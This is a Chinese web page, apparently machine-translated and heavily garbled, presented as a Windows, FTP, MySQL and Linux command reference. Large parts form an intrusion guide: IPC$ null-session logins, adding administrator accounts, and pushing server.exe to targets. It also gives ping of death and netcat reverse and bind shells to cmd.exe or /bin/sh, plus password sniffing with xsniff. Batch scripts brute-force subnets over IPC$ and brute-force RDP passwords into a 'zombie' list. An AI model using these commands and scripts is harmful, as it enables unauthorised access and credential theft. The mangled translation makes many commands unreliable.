,,net use 命令集合详解()

,,net use 命令集合详解()

Net使用命令和dos常用命令汇总,学习dos朋友必备知识。只有这样才能有助于批量技术的组合应用。

Net use \\ip\ipc$'' /user:' '建立ipc空链接net use \ \ IP \ IPC $' password' /user:'用户名'建立IPC非空链接net use h: \\ip\c$' password' /user:'用户名'直接登录后将对方C:映射到。

H: net use h: \\ip\c$登录后,将对方C:映射到H:net use \ \ IP \ Ipc $/del delete Ipc link net use H:/del delete mapping net user username password/add建立用户net user guest/Active:yes激活guest user net user以查看哪些用户net user account name查看account net local group administrator s username的属性/将“user”添加到administrator以使其

有管理员权限,注意:在administrator后面加s,用复数net start检查哪些服务是打开的。net start服务名打开服务;(例如,net start telnet、net start schedule) net stop服务名称停止服务net时间\\目标ip检查对方的时间net时间\\目标ip /set将本地计算机时间设置为与“目标ip”主机的时间同步,并添加

参数/yes可以取消确认消息net view查看本地局域网打开了哪些共享net view \\查看对方局域网打开了哪些共享。网络配置显示系统网络设置。网络注销断开共享。网络暂停服务名称暂停服务。NetSend ip“文本消息”向另一方发送消息。net ver LAN正在使用网络连接类型和信息。净份额检查本地开放的份额。net Share IPC $ Open IPC $ Share net Share IPC $/Del Delete IPC $ Share net Share C $/Del C:Share net user guest 12345。以来宾用户身份登录后,将密码更改为12345网络密码。更改系统登录密码netstat -a查看哪些端口是打开的,常用netstat -an netstat -n检查端口的网络连接。常用的netstat -an netstat -v来检查正在进行的工作netstat -p协议名称示例:netstat -p tcq/ip来检查协议的使用情况(检查tcp/ip

协议使用情况)netstat -s检查所有正在使用的协议的使用情况。如果对方136到139有一个端口是开着的,可以查看对方最近一次登录。

用户名(03前的用户名)-注意:参数-A要大写tracert-参数ip(或计算机名)跟踪路由(数据包),参数:“-w号”用于设置

设置超时间隔。Ping ip(或域名)向另一台主机发送默认大小为32字节的数据,带有参数:"-l[空格]

数据包大小“;”-n次发送数据“;”-t”的意思是一直ping。Ping -t -l 65550 ip Ping of death(发送大于64K的文件,一直ping就成了death。

Ping) ipconfig (winipcfg)用于windows NT和XP(windows 95 98)检查本地ip地址,

Ipconfig可以使用参数“/all”来显示所有配置信息。tlist -t以树形列表显示进程(是系统的附加工具,默认不安装,正在安装。

Support/tools文件夹下的目录)kill -F进程名加-F参数强制结束一个进程(作为系统的附加工具,默认为无安全。

,在安装目录的Support/tools文件夹下)del -F文件名加-F参数可以删除只读文件,/AR,/AH,/AS和/AA分别表示删除。

只读、隐藏、系统、存档文件、/A-R、/A-H、/A-S、/A-A表示删除除只读和隐藏文件以外的文件。

文件、系统和档案以外的文件。例如,“DEL/AR *。* "表示删除当前目录中的所有只读文本。

,“DEL/A-S *。* "表示删除当前目录中除系统文件以外的所有文件。

删除/S /Q目录或使用:rmdir /s /Q directory /S删除该目录及其所有子目录,并

文件。同时,当使用参数/Q取消删除操作时,系统会直接确认删除。(做了两个订单。

使用相同的)移动字母\路径\文件名移动后存储被移动文件的路径\文件名移动文件。

,用参数/y,会取消确认移动目录中存在相同文件的提示,直接覆盖fc one.txt two.txt 3st.txt。比较这两个文件,并将差异输出到3st.txt文件。

、“”和“”是位于id号的重定向命令,用于在/delete处打开已注册的计划任务以停止所有计划任务,并带有参数/yes以在id号处停止/delete以在\\ip时间检查所有计划任务时停止已注册的计划任务程序名称(或命令)/r在某个时间运行另一个程序并重新开始计算。

机器手指username @host查看最近有哪些用户登录了远离登录服务器的telnet ip端口,默认端口为23 open ip connected to IP(这是telnet登录后的命令)。通过在这台机器上直接键入telnet,telnet将输入这台机器的telnet副本路径\文件名1路径\文件名2 /y。将文件1作为文件2复制到指定目录,并使用参数

/y同时,取消您要覆盖现有目录文件副本c:\ SRV . exe \ \ IP \ admin的确认。将本地的c:\srv.exe复制到对方的admin。CPPY 1st.jpg/b 2st.txt/a 3st.jpg隐藏的2st.txt的内容在1st.jpg生成它。

3st.jpg的新文件,注意:2st.txt文件头要有三个空行,参数:/b指二进制文件,/a指。

ASCLL格式文件copy \ \ IP \ admin $ \ svv . exe c:\ or:copy \ \ IP \ admin $ \ *。*复制另一个admini$共享

下srv.exe文件(所有文件)到本地c: xcopy复制文件或目录树目标地址\目录名用参数/y复制文件和目录树

不会提示你覆盖同一个文件tftp -i自己的IP(这是以肉机为跳板时的肉机IP)获取server.exe C:\ server.exe。

登录后,将“IP”的server.exe下载到目标主机c:\server.exe参数:-i指两个。

进入传输模式,如传输exe文件,如果不加-i,在ASCII模式(传输文本文件模式

类型)要传输tftp -i IP put c:\server.exe登录后,将本地c:\server.exe上传到主机ftp ip端口,用于上传文件到服务器或文件操作。默认端口是21。斌指的是两个

系统传输(可执行文件);路由打印默认显示ASCII格式文本文件传输时的IP路由,主要会显示网络地址和子网掩码。

网络掩码、网关地址、接口地址查看和处理ARP缓存。ARP表示名称解析,负责将IP解析为物理IP。

性的MAC地址。Arp -a将显示所有信息。启动程序名或命令/max或/min。打开一个新窗口,最大化(最小化)某个进程。

或命令mem查看cpu使用率attrib文件名(目录名)查看文件属性(目录)attrib文件名-A -R -S -H或A R S H删除(添加)文件归档文件,只读。

,系统,隐藏属性;使用+添加要作为属性目录查看的文件。参数:/Q显示文件和目录属于系统的哪个用户,/T:C显示文件是何时创建的。

,/T:A显示文件的上次访问时间,/T:W上次修改时间date /t,time /t使用此参数,即" DATE/T "和" TIME/T ",只有当前日期和

时间,而不是输入新的日期和时间。set指定环境变量的名称=要分配给变量的字符。设置环境变量以显示所有当前环境变量。set p(或其他字符)显示以字符p(或其他字符)开头的所有当前环境变量。暂停暂停批处理程序,并显示:请按任意键继续.if在批处理程序中执行条件处理(有关更多说明,请参见if命令和变量)。goto标签将cmd.exe引导至批处理程序中的标记行(标签必须是单独的一行,并标记有

以冒号开头,例如:“:start”标签)调用路径\批处理文件名从一个批处理程序调用另一个批处理程序(有关更多说明,请参见

打电话/?)要对一组文件中的每个文件执行特定命令(有关更多说明,请参见命令和变量),请打开或关闭echo要打开或关闭echo,请仅使用不带参数的echo来显示当前的echo设置。回声信息显示在屏幕上。pass.txt将“信息”保存到pass.txt文件中。findstr 'Hello' aa.txt在aa.txt文件中查找字符串hello find文件名。查找文件的标题名。更改cmd窗口的标题名称。颜色颜色值设置CMD控制台的前景色和背景色。0=黑色,1=蓝色,2=绿色,3=浅绿色。

4=红色,5=紫色,6=黄色,7=白色,8=灰色,9=浅蓝色,a=浅绿色,B=浅绿色,C=浅红色,

D=淡紫色,E=淡黄,F=亮白色。提示名称改变显示的命令提示cmd.exe(改变C:\,D:\到:EntSky\)打印文件名打印一个文本文件。

在Verdos窗口下显示版本信息。winver弹出一个窗口显示版本信息(内存大小,系统版本,补丁版本,计算机名称

)format letter /FS: type格式化磁盘,类型:FAT,FAT32,NTFS,例如:format d:

/FS:NTFS md目录名创建目录替换源文件目录替换文件ren原始文件名新文件名重命名文件名树以树结构显示目录,使用参数-f,将列出第一个文件夹中的文件名。键入文件名显示文本文件的内容。更多文件名逐屏显示输出文件doskey。要锁定的命令=要解锁的字符DOS key=为DOS提供的锁定命令(编辑命令行,再次调用win2k命令,

并创建宏)。比如:lock dir命令:doskey dir=entsky (doskeydir=dir不能用);

Unlock: doskey dir=taskmgr调用任务管理器chkdsk /F D:检查磁盘D,显示状态报告;添加参数/f并修复磁盘上的错误。tlntadmn telnt服务admn,键入tlntadmn选择3,然后选择8,就可以更改telnet服务了。

默认端口23为任何其他端口exit,用于退出cmd.exe程序,或者目前使用参数/B退出当前批处理脚本,而不是使用cmd.exe路径PATH \可执行文件的文件名来设置可执行文件的路径。Cmd启动win2K命令解释窗口。参数:/eff,/en关闭和打开命令扩展。更窝

见cmd/?详情请见。regedit /s注册表文件名被导入注册表中;参数/S是指安静模式导入,没有任何提示;Regedit /e注册表文件名导出注册表cacls文件名参数显示或修改文件访问控制列表(ACL) -针对NTFS格式时。参数:/D username:设置为拒绝用户访问;/P username erm替换指定用户的访问权限。

权威;/G用户名erm给指定的用户访问权限;烫发可以是:n无,r读,

写,c改(写),f完全控制;示例:cacls D:\test.txt /D发布设置

D:\test.txt拒绝pub用户的访问。Cacls文件名查看文件REM文本内容的访问用户权限列表向批处理文件netsh视图添加注释或更改本地网络配置

IIS服务命令:iisreset /reboot重启win2k电脑(但是有系统重启的提示)。iisreset /start或stop可启动(停止)所有互联网服务。iisreset /restart停止并重新启动所有Internet服务。iisreset/Status显示所有Internet服务的状态。iisreset /enable或disable启用(禁用)在本地系统上重新启动Internet服务。

当启动、停止或重新启动互联网服务时,如果发生错误

将错误地重新启动iisreset /noforce。如果无法停止互联网服务,则不会强制终止互联网服务。达到超时(秒)时,iisreset /timeout Val没有停止Internet服务。如果指定

/rebootonerror参数,计算机将重新启动。默认是重启20秒,停止60秒。

,重新启动0秒。命令:ftp(后面会给出详细内容)FTP的命令行格式是:FTP-V-D-I-N-G [hostname]-V显示远程服务器的所有响应信息。-d使用调试模式。-n限制ftp自动登录,即不使用。netrc文件。-g取消全局文件名。帮助[命令]还是?[Command]检查命令描述。bye或quit终止主机FTP进程并退出FTP管理模式。pwd列出当前远程主机目录put或send本地文件名[上传到主机的文件名]并将本地文件发送到远程端。

主机中的Get或recv[远程主机文件名][本地下载的文件名]从远程主机传输到

本地主机中的mget [remote-files]从远程主机接收一批文件到本地主机mput local-files将一批文件从本地主机传输到远程主机dir或ls[remote-directory][local-files]列出当前远程主机目录中的文件。

如果有本地文件,则将结果写入本地文件。ascii设置以ASCII(默认值)bin格式发送文件,或者图像设置以二进制格式发送文件。bell每次发送文件时提示cdup返回上一个目录关闭中断与远程服务器的ftp会话(对应打开)打开主机[port]建立与指定ftp服务器的连接,可以指定连接端口删除删除文件mdelet[remote-files]在远程主机中删除一批文件mkdir directory-name建立目录重命名[from] [to]在远程主机中。更改远程主机中的文件名rmdir directory-name,删除远程主机中的目录状态,显示FTP的当前状态,显示远程主机的系统类型,user user-name[password][account],用另一个用户名登录远程主机open host [port]。重新建立新的连接提示交互提示模式macdef定义宏命令lcd改变当前本地主机的工作目录。如果是默认设置,请转到当前用户的主目录chmod来更改远程主机的文件权限。当case打开时,使用MGET命令将文件名复制到本地机器,所有文件名都转换成小写字母cd remote-dir进入远程主机目录cdup进入远程主机目录的父目录!在本地机器中执行交互式shell,并退出回到ftp环境,例如!ls*。活力

命令:MYSQL-h主机地址-u用户名-p密码连接MYSQL;如果MYSQL刚刚安装,超级用户

Root没有密码。(例:MySQL-h 110 . 110 . 110 . 110-uroot-p 123456注:u和root不需要加空格,其他也一样)退出MySQL admin-u username-p旧密码密码新密码更改密码grant select on database。*以“密码”标识的用户名@登录主机;提高

添加新用户。(注意:和上面不一样,后面的命令都是因为是MYSQL环境下的命令。

以分号作为命令终止符)显示数据库;显示数据库列表。一开始只有两个数据库:mysql和test。

Mysql库很重要。它包含MYSQL系统信息。我们更改密码并添加新用户,这实际上是

使用此库进行操作。使用mysql显示表格;显示描述库中数据表的表名;展示数据表的结构:创建数据库库名:构建库使用库名;创建表名(字段设置列表);设置表名下拉数据库库;删除表名;删除库和删除表从表名中删除;清除select * from表名中的记录;显示的表中的记录MySQL dump-opt school . BBB备份数据库:(命令在DOS的\\mysql\\bin中

目录执行);注意:将数据库school备份到school.bbb文件,这是一个

接受任何文本和文件名。打开它,你会发现新的东西。win2003系统下的新命令(实用部分):shut down参数关闭或重启本地或远程主机。参数描述:/S关闭主机,/R重新启动主机,/T数字设置延迟时间,范围从0到180。

秒,/A取消启动,/M //IP指定远程主机。示例:shutdown /r /t 0立即重新启动本地主机(没有延迟)。task ill/参数进程名称或进程的pid终止一个或多个任务和进程。参数说明:/pid要终止一个进程的pid,可以使用tasklist命令获取每个进程的pid。/IM想要

终止进程的进程名,/F强制终止进程,/T终止指定的进程及其启动的子进程。

程。任务显示当前在本地和远程主机上运行的进程、服务和服务进程的进程标记。

识别符号(PID)。参数说明:/M列出当前进程加载的dll文件,/SVC显示每个进程对应的服务。

如果没有参数,将只列出当前进程。

Linux系统下的基本命令:uname显示版本信息区分大小写(与win2K的Ver相同)。Dir显示当前目录文件,ls -al显示包含隐藏文件(与win2K的Dir相同)。PWD查询当前目录位置光盘光盘.回到上一个目录,注意cd和之间有一个空格.CD/返回到根目录。卡特彼勒文件名查看文件内容卡特彼勒abc.txt将内容写入abc.txt文件。更多文件名逐页显示文本文件。复制cp文件mv移动文件rm文件名删除文件,rm -a目录名删除目录和子目录mkdir目录名创建目录rmdir删除子目录,目录中没有文档。Chmod设置文件或目录的访问权限。grep在文件中搜索字符串diff file file comparison find file搜索当前日期、时间查询当前与您使用同一台机器的人以及登录时间和地点W查询当前计算机用户的详细信息whoami检查他的帐户名groups检查某人的组passwd更改密码历史记录检查他自己的订单ps显示进程状态kill停止一个进程gcc黑客通常用它来编译C语言。写文件su的权限转换为指定用户telnet IP telnet连接到另一台主机(与win2K相同)。当bash$出现时,连接成功。Ftp ftp连接到服务器(与win2K相同)

附:批处理命令和变量

1:FOR命令和变量的基本格式:FOR/parameters%变量in(set)do command[command _ parameters]%变量:

指定一个单字母的可替换参数,如:%i,并用:%%i指定一个变量,并调用

使用变量时:%i%,变量区分大小写(%i不等于%i)。从%0到% 9的每个批处理中可以处理10个变量,其中% 0默认用作批处理文件名。%1

默认情况下,这是使用该批次时输入的第一个值。同样,%2-%9是指输入的第2-9个值。例子

:netuse \ \ ip \ IPC $ pass/user: IP是%1,pass是% 2,user是%3。

(set):指定一个文件或一组文件,并使用通配符,例如:(D:\user.txt)和(1 1 254)(1

-1 254),{”(1 1 254)“第一个‘1’指初始值,第二个‘1’指增量,第三个‘254’

指最终值,即从1到254;(1 -1 254)的描述:即从254到1

命令:指定要对文件执行的命令,如net use命令;如果要执行多个命令

,使用以下命令命令此房间:分隔command_parameters:为特定命令指定参数或命令行开关。

IN (set):指(set)中的值;DO命令:指执行命令

参数:/L是指增量形式{当(set)是增量形式}时;/F表示从文件中连续获取值,直到获取为止。

直到{(set)是一个文件,比如(d:\pass.txt)}。用法示例:@echo off echo用法格式:test.bat *。*.*测试. txt

对于(1 1 254)中的/L %%G,请回显%1。%%G test.txt net use \\%1。%%G

/user:administrator | find ' command successfully completed ' test . txt另存为test.bat描述:依次尝试为指定的C类网段的254个IP地址建立administrator。

IPC$使用空密码连接,如果成功,将IP存储在test.txt中

/L表示增量形式(即从1-254或254-1);输入IP的前三位数字:*。*.*作为批处理默认值。

第% 1个,共个;%%G是变量(ip的最后一位);用于分隔echo和net use命令;

|表示ipc$建立后,在结果中使用find查看是否有‘命令成功完成’信息;%1.%%G是

完整的IP地址;(1 1 254)是指起始值、递增量和结束值。@echo off echo用法格式:ok . bat IP for/f % % I in(d:\user.dic)do SMB . exe % 1% % I d:\pass.dic 200另存为:ok.exe说明:输入一个IP后,用字典文件d:\ pass . DIC来消歧d:\ user . DIC

直到文件中的值结束。%%i是用户名;%1是输入的IP地址(默认

)。

2.if命令和变量的基本格式:IF [not] errorlevel数字命令语句,程序运行的话,最后会返回一个等于或大于一个手指的。

设置号码的退出码,指定条件为“真”。示例:IF errorlevel 0命令是指程序执行后返回值为0时,值行后的命令;

如果非错误级别1命令意味着如果程序执行返回的值不等于1,将执行下面的命令。0表示发现并成功执行(真);1表示没有发现或执行(假)。IF [not] string 1==string 2命令语句如果指定的文本字符串匹配(即string

1等于字符串2),下面的命令将被执行。示例:“if '%2%'=='4' goto start”表示:如果输入的第二个变量是4,则执行以下内容

Command(注意:% variable name%并在调用变量时添加' ')IF [not] exist文件名command语句如果指定的文件名存在,将执行下面的命令。例如:“如果不是nc.exe goto end”的意思是:如果没有找到nc.exe文件,跳转到':结束'标记。

签名。IF [not] errorlevel数字命令语句else命令语句或if [not] string 1==word

字符串2命令语句else命令语句或IF [not] exist文件名命令语句else命令

Add: else命令:在语句之后,当前面的条件不成立时,指的是else之后的生活。

秩序。注意:else必须在同一行上才有效。当有del命令时,你需要把所有的del命令

将内容括起来,因为del命令只能在单行上执行,使用后相当于一个人。

好吧。示例:“if exist test.txt. else echo”

Test.txt.missing ",注意了"。“在下命令。

(II)系统外部命令(需要下载所有相关工具):

1.瑞士军刀:nc.exe

参数描述:-h检查帮助信息-d后台模式-e prog程序重定向,执行【危险】一次连接-I secs delay的间隔-l监控模式,用于入站连接-L监控模式,连接关闭后继续监控直到CTR C -n IP地址。不能用域名-o膜记录十六进制传输-p[ space] port本地端口号-r随机本地和远程端口-t使用Telnet交互模式-u UDP模式-v详细输出,使用-vv更详细-w数字超时延时间隔-z将输入,输出关闭(用于锚扫描时)基本用法:nc -nvv 192.168.0.1 80连接192.168.0.1主机的80口nc -l -p 80,NC-L-p 5354-T-E C:winntsystem32cmd.exe在

远程的TCP 5354端口NC-t-e c:winntsystem32cmd.exe 192 . 168 . 0 . 2 5354确定远程主机的

Cmdshell并反接192.168.0.2的5354端口。高级用法:nc -L -p 80作为蜜罐使用1:打开并持续监听端口80直到CTR C. nc -L -p 80 c:\log.txt作为蜜罐使用2:打开并持续监听端口80直到

CTR C,并将结果输出到C:\ log . txt NC-L-P 80 C:\ honey port . txt作为蜜罐用3-1:打开并不断监听端口80,

直到CTR C,并将c:\honeyport.txt的内容发送到管道中,也可以起到传输文件的作用。type.exe C:\ honey port | NC-L-P 80作为蜜罐用3-2:打开不断监听80终端。

端口,高达CTR C,并将c:\honeyport.txt中的内容发送到管道中,也可以起到传输文件的作用:对方主机上使用nc -l -p本地端口:NC-E cmd.exe本地IP -p本地端口*win2K nc -e /bin/sh本地IP -p本地端口*linux,unix反向连接突破对方主机的防火。

在壁机上,使用nc -d -l -p本地端口要传输的文件的路径和名称;在另一台主机上,使用nc -vv本地IP的本地端口中存储的文件的路径和名称来传输文件。

其他主机注意:|管道命令或重定向命令。"",例如:tlntadmn test.txt是指test.txt的内容

分配tlntadmn命令@表示在@后执行命令,但不会显示(后台执行);例如:@ @dir c:\winnt

D:\log.txt的意思是:后台执行dir,结果保存在D: \ log.txt中,“”和“的区别是:覆盖;”表示:保存到(添加到)。例如分别为@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt

执行第二次比较:保存第二次结果,而第二次结果只是第一次结果。

,因为第二次的结果覆盖了第一次。

2.扫锚工具:xscan.exe

基本格式xscan -host start IP[- end IP]检测项[其他选项]扫描锚点' start IP to end

IP '段所有主机信息xscan -file主机列表文件名检测项[其他选项]扫描锚'主机IP列表文件

名称中的所有主机信息检测项'-主机存活的主动检测-远程操作系统类型的os检测(通过NETBIOS和SNMP协议) -常用服务的端口状态的端口检测-ftp检测ftp弱密码-pub检测FTP服务匿名用户写权限-pop3检测pop 3-服务器弱密码-smtp检测SM TP-服务器漏洞-sql检测SQL-服务器弱密码-smb检测NT-服务器弱密码-iis检测iis编码/解码漏洞-cgi检测cgi漏洞-nasl加载Nessus攻击脚本-以上所有项目的全部检测其他选项-i适配器号设置网络适配器、 可以通过'-l '参数获得适配器号-l显示所有网络适配器-v显示详细的扫描进度-p跳过没有响应的主机-o跳过没有检测到开放端口的主机-t并发线程数,并发主机数指定最大并发线程数和并发主机数,静默

识别100,10 -log文件名的数量,以指定扫描报告的文件名(后缀为:TXT或HTML文件)。使用示例xscan-主机192 . 168 . 1 . 1-192 . 168 . 255 . 255-全活动-p检测

192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过检测无响应主机xscan-host 192 . 168 . 1 . 1-192 . 168 . 255 . 255-port-sm b-T150-o。

92.168.1.1-192.168.255.255网段中主机的标准端口状态,nt弱密码用户,最大

并发线程的数量是150。跳过未检测到开放端口的主机xscan-file hostlist . txt-port-CGI-t200。5-V-O检测到“hostlist.txt”

文件CGI漏洞中列出的所有主机的标准端口状态,最大并发线程数为200,与

一次最多检测5台主机,显示详细的检测进度,并跳过未检测到开放端口的主机。

3.命令行嗅探器:xsniff.exe可以捕获FTP/SMTP/pop 3/HTTP协议密码参数描述-tcp传出tcp数据报-udp传出udp数据报-icmp传出icmp数据报-传递过滤密码信息-隐藏后台运行-主机解析主机名-地址IP地址过滤IP地址-端口端口过滤端口-日志文件名保存输出到文件-asc带SCII格式输出-十六进制格式输出用法示例xsniff . exe-pass-hide-log pass . log在后台运行嗅探密码并将密码信息保存在

pass.log文件中的xsniff . exe-tcp-UDP-ASC-addr 192.168.1.1嗅探192 . 168 . 1 . 1并过滤TCP和

Udp信息并以ASCII格式输出。

4.终端服务密码破解:tscrack.exe

参数描述-h显示帮助-v显示版本信息-s在屏幕上显示解密能力-b密码错误时发出的声音-t与发送多个连接(多线程)相同-n阻止目标服务器上的系统日志条目-u卸载删除tscrack组件-f使用密码后-F-f间隔(频率)-l使用用户名后-w使用-w密码字典后-p使用-p密码后-D登录主页使用示例ts crack 192 . 168 . 0 . 1-l administrator-wpass . DIC远程密码字典文件突发

主机管理员tscrack 192 . 168 . 0 . 1-l administrator-p 123456的登录密码为123456远程登录。

192.168.0.1的管理员用户@ ifnotexistipscan . txt gotonoscan @ for/f ' tokens=1 delims=' % % I in(3389 . txt)do hack . bat % % I nscan @ echo 3389 . txt无查找或扫描失败(另存为3389.bat)(假设有多位3389的车主被SuperScan或其他锚点扫地机扫描,

IP列表文件3389.txt) 3389.bat的意思是:从3389.txt文件中取一个IP,然后运行hack . bat @ ifnotexist tscrack.exe gotonoscan @ ts crack % 1-l administrator-wpass . dicrouji . txt:no scan @ echo tscrack.exe no find或scan失败。(保存为hack.bat)(运行3389.bat就可以了,还有3389.bat,hack.bat,3389.txt,

Pass.dic和tscrack.exe在同一个目录下;你可以等结果。)hack.bat的意思是:运行tscrack.exe,使用字典暴露3389.txt中的所有主机

管理员密码,并将破解结果保存在rouji.txt文件中。

5.其他:

Shutdown.exe关机\ \ IP地址T: 20会在20秒后自动关闭对方NT(Windows 2003系统自带工具

,在Windows2000下,你得下载这个工具才能使用。在之前的Windows 2003 DOS命令中

有详细的介绍。)fpipe.exe(TCP端口重定向工具)在第二篇文章(端口重定向绕过防火

墙)FPIPE-L 80-S 1029-R 80[URL]www.sina.com.cn[/URL]有人扫锚你的端口80,他就扫

结果会是[url]www.sina.com.cn[/url]的主机信息。Fpipe -l 23 -s 88 -r 23目标IP从本地计算机通过终端向目标IP发送23端口Telnet请求。

端口重定向后,通过端口88发送到目标IP的端口23。(使用目标IP建立Telnet。

机器使用的88端口连接到它)然后:Telnet 127.0.0.1(本地IP)直接连接到

目标IP的端口23。Opentelnet.exe(远程打开Telnet工具)opentelnet.exe \ \ IP账号密码ntlm认证Telnet端口(无需上传

Ntlm.exe破坏了微软的认证方法)。直接远程开通对方telnet服务后即可使用。

Telnet \\ip连接到另一方。NTLM身份验证方法:0:不使用NTLM身份验证;1:如果失败,首先尝试NTLM身份验证

,然后使用用户名和密码;2:仅使用NTLM认证。

ResumeTelnet.exe(附加到OpenTelnet的另一个工具)resumeTelnet.exe \ \ IP帐户的密码被Telnet连接到另一方后,使用此命令

恢复对方的Telnet设置,同时关闭Telnet服务。

6.FTP命令的详细解释:

FTP命令是互联网用户最常用的命令之一。熟悉并灵活应用FTP内部命令。

,可以大大方便用户,事半功倍。如果你想学习使用后台FTP

加载,那么你必须学习FTP指令。

FTP的命令行格式是:FTP-v-d-I-n-g[主机名],其中

-v显示远程服务器的所有响应信息;

-n限制ftp自动登录,即不使用;n etrc文件;

-d使用调试模式;

-g取消全局文件名

郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。

相关文章阅读

  • word文档无法编辑是怎么回事-
  • 华为手机怎么设置返回键(华为手机下面的三个按键设置方法)
  • lumia950怎么样(Lumia950体验分享)
  • otg连接是什么意思(OTG连接手机方法)
  • 笔记本触摸板怎么右键(笔记本电脑触控板手势操作设置)
  • 真我x7怎么样(realme X7 系列体验)
  • 苹果的A16处理器有多强(苹果的A16处理器的介绍)
  • 小米互传怎么用(小米手机的连接与共享教程)
  • 怎么设置电脑桌面图标自动对齐 设置电脑桌面自动整理图标的方法
  • 宽带错误651最简单解决方法(处理宽带错误651的措施)
  • 大学生手机有什么推荐(大学生换手机攻略)
  • 天玑1100和骁龙778g哪个好(骁龙778G、天玑900、天玑1100购选建议)
  • yum update 升级报错的解决办法
  • Windows10禁用屏保教程
  • 连接wifi显示无互联网连接怎么办(无线连上了却不能上网处理绝招)
  • 留言与评论(共有 条评论)
       
    验证码: